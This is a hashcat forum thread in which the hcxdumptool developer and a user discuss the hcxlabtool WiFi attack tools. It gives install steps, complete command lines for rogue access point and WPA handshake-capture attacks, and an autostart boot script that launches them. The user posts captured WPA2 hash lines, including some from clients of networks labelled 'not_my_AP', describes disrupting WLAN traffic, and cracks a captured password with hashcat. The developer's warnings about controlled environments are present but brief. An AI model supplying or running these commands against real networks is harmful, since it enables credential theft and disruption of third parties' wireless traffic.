hashcat Forum
hcxdumptool - missing frames w/ filtering - Printable Version

+- hashcat Forum (https://hashcat.net/forum)
+-- Forum: Support (https://hashcat.net/forum/forum-3.html)
+--- Forum: hashcat (https://hashcat.net/forum/forum-45.html)
+--- Thread: hcxdumptool - missing frames w/ filtering (/thread-11212.html)

Pages: 1 2 3 4 5 6


RE: hcxdumptool - missing frames w/ filtering - ZerBea - 01-17-2023

Running inside a VM often result in latency problems. I got a lot of bug reports regarding this configuration (VM), but I can't reproduce that because I'm running Arch and Debian (bookworm), only.
Test target devices:
several Samsung Phones (Android 13), a Samsung Tablet, some older LG phones, an iPad, an older iPhone, a notebook (Arch Linux - wpa_supplicant).
All of them try to connect to hcxdumptool
Test target routers:
a new FRITZBOX, some old FRITZBOXEs an old Arcadyan Speedport, several TP-LINKs and hostapd (Arch notebook).
distance between CLIENT and AP <= 5m
distance to attack device 1 .. 20m
encryption type WPA2 (mostly), WPA2/WPA1 mixed mode, WPA1 and WPA2/WPA3 transition mode
It is mandatory that hcxdumptool/hcxlabtool respond faster(!) to a CLIENT than its designated AP.
Please try hcxlabtool series. This tools are a lot faster:
Code:
$ hcxlabgetmallpr --onsigterm=exit --essidlist=targetessid.list --essidmax=100 --m2attempt=10 -c 13,1,6,11,2,1,6,11,3,1,6,11,4,1,6,11,5,1,6,11,7,1,6,11,8,1,6,11,9,1,6,11,10,1,6,1,12,1,6,11
or better, if you know the operation channel of the AP:
Code:
$ hcxlabgetmallpr --onsigterm=exit --essidlist=targetessid.list --essidmax=100 --m2attempt=10 -c xx
Please notice:
If the AP is state of the art, it will notice the presence of several new APs (coming from hcxlabtool) and move to another channel.


RE: hcxdumptool - missing frames w/ filtering - pipss - 01-18-2023

I cheched https://github.com/ZerBea/wifi_laboratory Could you please advise how to install labtools? I couldn't find the way to install them. Thank you.


RE: hcxdumptool - missing frames w/ filtering - ZerBea - 01-18-2023

After going open source, I got several feature requests and pull requests and added them to hcxdumptool. But every feature and every option has a price tag and hcxdumptool became a Dinosaur:
A beautiful real time display will take CPU cycles.
On the fly decoding calculating a PSK/PMK (weak candidate) will take CPU cycles.
Remote connection to a CLIENT will take CPU cycles.
Easy to use filter lists (options filter mode and filter list will take CPU cycles.
EAP attack (TLS) will take CPU cycles.

WiFi laboratory (hcxlabtool series) is highly experimental and ultra fast. It is designed to test new attack modes (which are later on added to hcxdumptool). It is designed to run completely headless.
There are no CPU cycle expensive options. Instead of using options, we compile the features directly into the tool. That result in several different tools, made by a single source file:
Code:
hcxlabgetm1 = request PMKID
hcxlabgetm2 = request EAPOL M2 from CLIENT
hcxlabgetm2wc = transmit wild card BEACONs and request EAPOL M2 from CLIENT
hcxlabgetm2pr = transmit 10 different PROBERESPONSEs to a single PROBEREQUEST and EAPOL M2 from CLIENT
hcxlabgetm2wcpr = combination of hcxlabgetm2wc and hcxlabgetm2pr
hcxlabgetm1234 = get full 4way handshake
hcxlabgetmall = do all mentioned above (except ...wc and ...pr)
hcxlabgetmallwc  = do all mentioned above (except ...pr)
hcxlabgetmallpr  = do all mentioned above (except ...wc)
hcxlabgetmallwcpr  = do all mentioned above
hcxlabdumpall = store data and unhandled frames to pcapng file

This tools are designed to test new features (to be added to hcxdumptool). They are designed to run headless on systems like this ones:
https://github.com/ZerBea/hcxdumptool/wiki/Penetration-testing-system-1
https://github.com/ZerBea/hcxdumptool/wiki/Penetration-testing-system-2

Operation system is a minimalist Debian (bookworm - unfortunately Arch stopped supporting armv6):
No GUI
No unwanted tasks.
No unwanted services.
No unwanted tools.
Everything uninstalled what we don't need.
No monitor.
No keyboard (Raspberry is controlled via GPIO).
Onboard chips (HDMI, BT and Broadcaom WiFI disabled.
Onboard LED disabled.

It will run on other systems, too. But it will slowed down.

Installation is very simple:
Code:
$ git clone https://github.com/ZerBea/wifi_laboratory

$ sudo make install
cc -O3 -Wall -Wextra  -o hcxlabgetm1 hcxlabtool.c -DGETM1 -DSTATUSOUT
cc -O3 -Wall -Wextra  -o hcxlabgetm2 hcxlabtool.c -DGETM2 -DSTATUSOUT
cc -O3 -Wall -Wextra  -o hcxlabgetm2wc hcxlabtool.c -DGETM2 -DBEACONUNSET -DSTATUSOUT
cc -O3 -Wall -Wextra  -o hcxlabgetm2pr hcxlabtool.c -DGETM2 -DGETM2PR -DSTATUSOUT
cc -O3 -Wall -Wextra  -o hcxlabgetm2wcpr hcxlabtool.c -DGETM2 -DGETM2PR -DBEACONUNSET -DSTATUSOUT
cc -O3 -Wall -Wextra  -o hcxlabgetm1234 hcxlabtool.c -DGETM1234 -DSTATUSOUT
cc -O3 -Wall -Wextra  -o hcxlabgetmall hcxlabtool.c  -DGETM1 -DGETM2 -DGETM1234 -DSTATUSOUT
cc -O3 -Wall -Wextra  -o hcxlabgetmallwc hcxlabtool.c  -DGETM1 -DGETM2 -DGETM1234 -DBEACONUNSET -DSTATUSOUT
cc -O3 -Wall -Wextra  -o hcxlabgetmallpr hcxlabtool.c  -DGETM1 -DGETM2 -DGETM2PR -DGETM1234 -DSTATUSOUT
cc -O3 -Wall -Wextra  -o hcxlabgetmallwcpr hcxlabtool.c  -DGETM1 -DGETM2 -DGETM2PR -DGETM1234 -DBEACONUNSET -DSTATUSOUT
cc -O3 -Wall -Wextra  -o hcxlabdumpall hcxlabtool.c -DDUMPIPV4 -DDUMPIPV6 -DDUMPWEP -DDUMPWPA
install -D -m 0755 hcxlabgetm1 /usr/local/bin/hcxlabgetm1
install -D -m 0755 hcxlabgetm2 /usr/local/bin/hcxlabgetm2
install -D -m 0755 hcxlabgetm2wc /usr/local/bin/hcxlabgetm2wc
install -D -m 0755 hcxlabgetm2pr /usr/local/bin/hcxlabgetm2pr
install -D -m 0755 hcxlabgetm2wcpr /usr/local/bin/hcxlabgetm2wcpr
install -D -m 0755 hcxlabgetm1234 /usr/local/bin/hcxlabgetm1234
install -D -m 0755 hcxlabgetmall /usr/local/bin/hcxlabgetmall
install -D -m 0755 hcxlabgetmallwc /usr/local/bin/hcxlabgetmallwc
install -D -m 0755 hcxlabgetmallpr /usr/local/bin/hcxlabgetmallpr
install -D -m 0755 hcxlabgetmallwcpr /usr/local/bin/hcxlabgetmallwcpr
install -D -m 0755 hcxlabdumpall /usr/local/bin/hcxlabdumpall
rm -f hcxlabgetm1
rm -f hcxlabgetm2
rm -f hcxlabgetm2wc
rm -f hcxlabgetm2pr
rm -f hcxlabgetm2wcpr
rm -f hcxlabgetm1234
rm -f hcxlabgetmall
rm -f hcxlabgetmallwc
rm -f hcxlabgetmallpr
rm -f hcxlabgetmallwcpr
rm -f hcxlabdumpall
rm -f *.o *~

$ hcxlabgetmall -v
hcxlabgetmall 1.0.1 (C) 2023 ZeroBeat
This set of tools is installed to /usr/local/bin (not like hcxdumptool to /usr/bin)

Now you're ready to go. Example of command lines:
Code:
$ hcxlabgetmallpr --onsigterm=exit --ongpiobutton=poweroff --ontot=reboot --onerror=reboot --gpio_button=4 --gpio_statusled=17 --bpfc=own.bpfc --essidlist=standard.essidliste --essidmax=50 --m2attempt=4 -c 13,1,6,11,2,1,6,11,3,1,6,11,4,1,6,11,5,1,6,11,7,1,6,11,8,1,6,11,9,1,6,11,10,1,6,1,12,1,6,11 &

$ hcxlabgetm2 --onsigterm=exit --ongpiobutton=poweroff --ontot=reboot --onerror=reboot --gpio_button=4 --gpio_statusled=17 --tot=4320 --bpfc=own.bpfc --essidlist=standard.essidliste --essidmax=25 --m2attempt=4 -t 600 -c 1,2,3,4,5,6 &

$ hcxlabgetm2pr --onsigterm=exit --ongpiobutton=poweroff --ontot=reboot --onerror=reboot --gpio_button=4 --gpio_statusled=17 --tot=4320 --bpfc=own.bpfc --essidlist=standard.essidliste --essidmax=25 --m2attempt=4 -t 600 -c 1,2,3,4,5,6 &

This options should be used in combination with a hardware modified (GPIO LED and GPIO button) Raspberry Pi), only:
Code:
--ongpiobutton=poweroff --ontot=reboot --onerror=reboot --gpio_button=4 --gpio_statusled=17

This command lines are started by automatic and run in background after Raspberry Pi is powered on. This is done via .bash_profile:
#!/bin/bash
[code]
iw reg set IN
chmod 777 -R /home
cd /home
#hcxlabgetmallpr --onsigterm=exit --ongpiobutton=poweroff --ontot=reboot --onerror=reboot --gpio_button=4 --gpio_statusled=17 --bpfc=own.bpfc --essidlist=standard.essidliste --essidmax=50 --m2attempt=4 -c 13,1,6,11,2,1,6,11,3,1,6,11,4,1,6,11,5,1,6,11,7,1,6,11,8,1,6,11,9,1,6,11,10,1,6,1,12,1,6,11 &
#hcxlabgetmallpr --onsigterm=exit --ongpiobutton=poweroff --ontot=reboot --onerror=reboot --gpio_button=4 --gpio_statusled=17 --bpfc=own.bpfc --essidlist=standard.essidliste --essidmax=50 --m2attempt=4 -c 128,1,36,2,124,3,40,4,120,5,44,6,116,7,48,8,112,9,52,10,108,11,56,12,104,13,60,1,100,6,64,11 &
#hcxlabgetmallpr --onsigterm=exit --ongpiobutton=poweroff --ontot=reboot --onerror=reboot --gpio_button=4 --gpio_statusled=17 --bpfc=own.bpfc --essidlist=standard.essidliste --essidmax=50 --m2attempt=4 -c 13,36,1,40,2,44,3,48,4,52,5,56,6,60,7,64,8,100,9,104,10,108,11,112,12,116,1,120,2,124,3,128,4,132,5,136,6,140,7,144,8,149,9,153,10,157,11,161,12,165,1,169,6,173,11 &
#hcxlabgetm2 --onsigterm=exit --ongpiobutton=poweroff --ontot=reboot --onerror=reboot --gpio_button=4 --gpio_statusled=17 --tot=4320 --bpfc=own.bpfc --essidlist=standard.essidliste --essidmax=25 --m2attempt=4 -t 600 -c 1,2,3,4,5,6 &
#hcxlabgetm2pr --onsigterm=exit --ongpiobutton=poweroff --ontot=reboot --onerror=reboot --gpio_button=4 --gpio_statusled=17 --tot=4320 --bpfc=own.bpfc --essidlist=standard.essidliste --essidmax=25 --m2attempt=4 -t 600 -c 1,2,3,4,5,6 &
systemctl start dhcpcd.service
systemctl start ssh.service

The simplest command line (and the most aggressive) is:
Code:
$ sudo hcxlabgetmall -i wlp39s0f3u1u1u1 --bpfc=protect.bpfc -c 1,6,11
where wlp39s0f3u1u1u1 is your interface name

make uninstall will remove them:
Code:
$ sudo make uninstall
rm -f /usr/local/bin/hcxlabgetm1
rm -f /usr/local/bin/hcxlabgetm2
rm -f /usr/local/bin/hcxlabgetm2wc
rm -f /usr/local/bin/hcxlabgetm2pr
rm -f /usr/local/bin/hcxlabgetm2wcpr
rm -f /usr/local/bin/hcxlabgetm1234
rm -f /usr/local/bin/hcxlabgetmall
rm -f /usr/local/bin/hcxlabgetmallwc
rm -f /usr/local/bin/hcxlabgetmallpr
rm -f /usr/local/bin/hcxlabgetmallwcpr
rm -f /usr/local/bin/hcxlabdumpall


BTW:
"I couldn't find the way to install them."
This is deliberate. Detailed knowledge is mandatory:
Code:
* knowledge of radio technology
* knowledge of electromagnetic-wave engineering
* detailed knowledge of 802.11 protocol
* detailed knowledge of key derivation functions
* detailed knowledge of Linux
* detailed knowledge of filter procedures (Berkeley Packet Filter, capture filter, display filter)



RE: hcxdumptool - missing frames w/ filtering - ZerBea - 01-18-2023

If you compare such a system:
MAC -> VM Fusion -> K A L I (overloaded due to serval started services and mostly not well configured by default, as well as unsuitable drivers like rtl8812au)
to this highly optimized systems:
https://github.com/ZerBea/hcxdumptool/wiki/Penetration-testing-system-1
https://github.com/ZerBea/hcxdumptool/wiki/Penetration-testing-system-2
I'm sure you'll understand my recommendations and you correctly interpret my results.


RE: hcxdumptool - missing frames w/ filtering - pipss - 01-18-2023

Done testing with labtools. My channels are 7 and 10, scanning around 10 minutes.

Code:
sudo hcxlabgetmallpr --onsigterm=exit --essidlist=essid --essidmax=100 --m2attempt=10 -c 7,10

dce99422f2a4 e89f805a386f  2457  10 M1M2ROGUE
dce99422f2a4 e89f805a386f  2457  10 M1M2
dce99422f2a4 e89f805a386f  2457  10 M1M2M3
dce99422f2a4 e89f805a386f  2457  10 M1M2M3M4
784b872bf63e 000c53051f36  2457  10 M1M2ROGUE
784b872bf63e 000c53051f36  2457  10 M1M2ROGUE
784b872bf63e e89f805a386f  2457  10 M1M2ROGUE
def15903154e e89f805a386f  2457  10 PMKID
ac89955fc775 000c53051f3a  2442  7 M1M2ROGUE
ac89955fc775 000c53051f3a  2442  7 M1M2ROGUE
ac89955fc775 000c53051f3a  2442  7 M1M2ROGUE
ac89955fc775 000c53051f3a  2457  10 M1M2ROGUE
ac89955fc775 000c53051f3a  2442  7 M1M2ROGUE
ac89955fc775 000c53051f3a  2442  7 M1M2ROGUE
ac89955fc775 000c53051f3a  2457  10 M1M2ROGUE
ac89955fc775 000c53051f3a  2457  10 M1M2ROGUE
ac89955fc775 000c53051f3a  2442  7 M1M2ROGUE
ac89955fc775 000c53051f3a  2457  10 M1M2ROGUE
04d4c48b1cf5 e89f805a386f  2457  10 M1M2ROGUE
32f725b62de3 000c53051f45  2457  10 M1M2ROGUE
^C
terminated loop
Output
Code:
hcxhashtool --info=stdout -i test.22000
     
SSID.......: my_AP
MAC_AP.....: 000c53051f36 (Unknown)
MAC_CLIENT.: 784b872bf63e (Unknown)
VERSION....: 802.1X-2001 (1)
KEY VERSION: WPA2
REPLAYCOUNT: 61539
RC INFO....: ROGUE attack / NC not required
MP M1M2 E2.: challenge
MIC........: 6b8b0a366b41e92d0c54414c9c0e0612
HASHLINE...: WPA*02*6b8b0a366b41e92d0c54414c9c0e0612*000c53051f36*784b872bf63e*41534b3838*8040afc11030361417a6d73c40c5fdaf250e2ed8a61515aac317ec5815c38711*0103007502010a0000000000000000f06395f3857f4a195a3114790e6cda01427767eae879969c418a644bc7bb8dcaabfd000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020000*10

SSID.......: not_my_AP-1
MAC_AP.....: 000c53051f3a (Unknown)
MAC_CLIENT.: ac89955fc775 (Unknown)
VERSION....: 802.1X-2001 (1)
KEY VERSION: WPA2
REPLAYCOUNT: 61539
RC INFO....: ROGUE attack / NC not required
MP M1M2 E2.: challenge
MIC........: d94c4df3e85351a6be18d12d3223c579
HASHLINE...: WPA*02*d94c4df3e85351a6be18d12d3223c579*000c53051f3a*ac89955fc775*e5878ce5b9b3e381ae6950686f6e65*8040afc11030361417a6d73c40c5fdaf250e2ed8a61515aac317ec5815c38711*0103007502010a0000000000000000f0634141d1fa8b4688e4edb7d372cd8e164cb8deb67da987a26aa40233c2073e6388000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020000*10

SSID.......: not_my_AP-2
MAC_AP.....: 000c53051f45 (Unknown)
MAC_CLIENT.: 32f725b62de3 (Unknown)
VERSION....: 802.1X-2004 (2)
KEY VERSION: WPA2
REPLAYCOUNT: 61539
RC INFO....: ROGUE attack / NC not required
MP M1M2 E2.: challenge
MIC........: fc29186d21463a5196aec3d7c5679550
HASHLINE...: WPA*02*fc29186d21463a5196aec3d7c5679550*000c53051f45*32f725b62de3*686f70686f7030373135*8040afc11030361417a6d73c40c5fdaf250e2ed8a61515aac317ec5815c38711*0203007502010a0010000000000000f063500bafcd657f86d0efbfe8f42fdfe1867b821d1b1a9bd5cdad59b070fbdd9f92000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020c00*10

SSID.......: my_AP
MAC_AP.....: e89f805a386f (Unknown)
MAC_CLIENT.: 04d4c48b1cf5 (Unknown)
VERSION....: 802.1X-2001 (1)
KEY VERSION: WPA2
REPLAYCOUNT: 61539
RC INFO....: ROGUE attack / NC not required
MP M1M2 E2.: challenge
MIC........: b606a3cb8dc3c9a48789266741a3b04b
HASHLINE...: WPA*02*b606a3cb8dc3c9a48789266741a3b04b*e89f805a386f*04d4c48b1cf5*41534b3838*8040afc11030361417a6d73c40c5fdaf250e2ed8a61515aac317ec5815c38711*0103007502010a0000000000000000f06331f2c9d819a29528d508f19923ec29ef32c7547b9f10415c5bf891a8f07e405a000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020000*10

SSID.......: my_AP
MAC_AP.....: e89f805a386f (Unknown)
MAC_CLIENT.: 784b872bf63e (Unknown)
VERSION....: 802.1X-2001 (1)
KEY VERSION: WPA2
REPLAYCOUNT: 61539
RC INFO....: ROGUE attack / NC not required
MP M1M2 E2.: challenge
MIC........: 6b8b0a366b41e92d0c54414c9c0e0612
HASHLINE...: WPA*02*6b8b0a366b41e92d0c54414c9c0e0612*e89f805a386f*784b872bf63e*41534b3838*8040afc11030361417a6d73c40c5fdaf250e2ed8a61515aac317ec5815c38711*0103007502010a0000000000000000f06395f3857f4a195a3114790e6cda01427767eae879969c418a644bc7bb8dcaabfd000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020000*10

SSID.......: my_AP
MAC_AP.....: e89f805a386f (Unknown)
MAC_CLIENT.: dce99422f2a4 (Unknown)
VERSION....: 802.1X-2001 (1)
KEY VERSION: WPA2
REPLAYCOUNT: 61539
RC INFO....: ROGUE attack / NC not required
MP M1M2 E2.: challenge
MIC........: 4e7012bb82bc533273f1c1e9362cce97
HASHLINE...: WPA*02*4e7012bb82bc533273f1c1e9362cce97*e89f805a386f*dce99422f2a4*41534b3838*8040afc11030361417a6d73c40c5fdaf250e2ed8a61515aac317ec5815c38711*0103007502010a0000000000000000f063dfdb4ee40d3bad7b1e7bb9e4ae2127a39fca62b360c6a011c458f3b73d1c0c9a000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020c00*10

Are results from labtool scan are more informative compare to previous hcxdumptool scan?

I'm curious about system-1 and system-2. I use Raspberry Pi for Mac Time machine and torrent files, but keen to built another one for pentesting. Are system-1/2 "open source" or strictly private projects?


RE: hcxdumptool - missing frames w/ filtering - ZerBea - 01-18-2023

Completely open source:
Raspberry Pi Zero
modification as mentioned here:
https://github.com/ZerBea/hcxdumptool/blob/master/docs/gpiowait.odg
config file as mentioned here:
https://github.com/ZerBea/hcxdumptool/blob/master/docs/config.txt
MediaTek or Ralink device (currently I'm testing some cheap Realtek devices running new upstream driver https://github.com/kimocoder/realtek_rtwifi)
Raspberry Pi OS Lite (changed to SID, removed unwanted services) on old Raspberry Pi systems:
https://www.raspberrypi.com/software/operating-systems/
or
Arch Linux arm7 on newer Raspberry Pi systems:
http://dk.mirror.archlinuxarm.org/os/

Are results from labtool scan are more informative compare to previous hcxdumptool scan?
Less informative regarding status display, but retrieving more information from target within less time.

M1M2ROGUE = successful attack against CLIENT


RE: hcxdumptool - missing frames w/ filtering - ZerBea - 01-18-2023

While hcxlabgetmallpr is running open the Network Settings (WiFi) of your smart phone, do a WiFi scan, choose a NETWORK from the list and type a Password, when requested.
You should see MM1M2ROGUE on hcxlabgetmallpr.
Stop hcxlabgetmallpr and convert the pcapng fily by hcxpacapngtool & option --all
Run hashcat (to speed up this demonstration, the PSK should be inside the word list you'll running to feed hashcat).


RE: hcxdumptool - missing frames w/ filtering - pipss - 01-19-2023

I typed in AP wifi password (not real one, just 8 digits) on Android 9 phone, got M1M2ROGUE and I could recover those 8 digits later w/ hashcat. But this didn't work with latest iphone. Looks like iphone's are very rigid. 

Also while hcxlabgetmallpr was scanning i couldn't  connect to my AP, even if i stand close to my AP and scanning laptop was in another room, behind the double wall.

I got my wifi printer M1M2ROGUE and M1M2M3M4 in less than 10 seconds of scanning, while my printer was located 1 meter away from AP, but my _kali on fusion laptop was in the next room, behind the double wall about 4 meters away from that AP. Quite impressive to attack weak CLIENT's with fast scanner. And this in just scanner running on VMware, i could only imagine dedicated Raspberry performance Smile

Questions:
1) my AP was in essid list (one name only), but scanner also attack CLIENT which was connected to another AP, that AP wasn't in the essid list. Why?
2) about --all flag, it makes huge list of the same hashes of the same AP, but with different MIC's, are any advantages of this output?


RE: hcxdumptool - missing frames w/ filtering - ZerBea - 01-19-2023

"Also while hcxlabgetmallpr was scanning i couldn't connect to my AP, even if i stand close to my AP and scanning laptop was in another room, behind the double wall."
[code]
That is noticed in README.md of hcxdumptool: Warning section
* hcxdumptool is able to prevent complete wlan traffic
(depend on selected options)
[code]

This (interception of EAPOL M2 frames) can be controlled via m2attempt option
--m2attempt=<digit> : reject CLIENT request after n received M2 frames

"My AP was in essid list (one name only), but scanner also attack CLIENT which was connected to another AP, that AP wasn't in the essid list. Why?"
Can only be controlled via BPF (set attack or protect BPF code)
hcxlabtool series and hcxdumptool is interactive. Both tools take every ESSID they can find in the traffic and put them together with the user defined ESSIDs into a list.
While hcxdumptool only respond to a CLIENT using the requested ESSID, hcxlabtool pr series respond 10 ESSIDs from the list at the same time.

"About --all flag, it makes huge list of the same hashes of the same AP, but with different MIC's, are any advantages of this output?"
Analysis purpose to e.g. determine how many PSKs an attacker typed to get ACCESS to a NETWORK
hcxlabgetmallpr --m2attempts=1000
A possible attacker is 1000 times asked to type a PSK (user typed password1, password2, password3.....pasword1000
hcxpcapngtool --all
We convert all 1000 (instead of the best one) to find out what he typed. This gives us information about the word list the attacker have used to get access to "our" network.

BTW:
"Looks like iphone's are very rigid. "
I'm working on it.

As all hcxtools (that include hcxdumptool, too) this tools are (interactive) analysis tools. Main purpose is to detect as fast as possible what other tools can't detect and to discover weak points.
All tools should only be used in in a 100% controlled environment(!).
If you can't control the environment it is absolutely mandatory to set the BPF.
To prevent disturbing other participants of the WiFi spectrum it is also mandatory to reduce TX power and to use directional antennas.


RE: hcxdumptool - missing frames w/ filtering - ZerBea - 01-19-2023

What do you think:
Shall a add a verification to hcxdumptool / WiFi laboratory that check the presence of a BPF (and remove filterlist and filtermode completely). If BPF is not present, the tools will not start.
This could prevent unexperienced users from using the tools.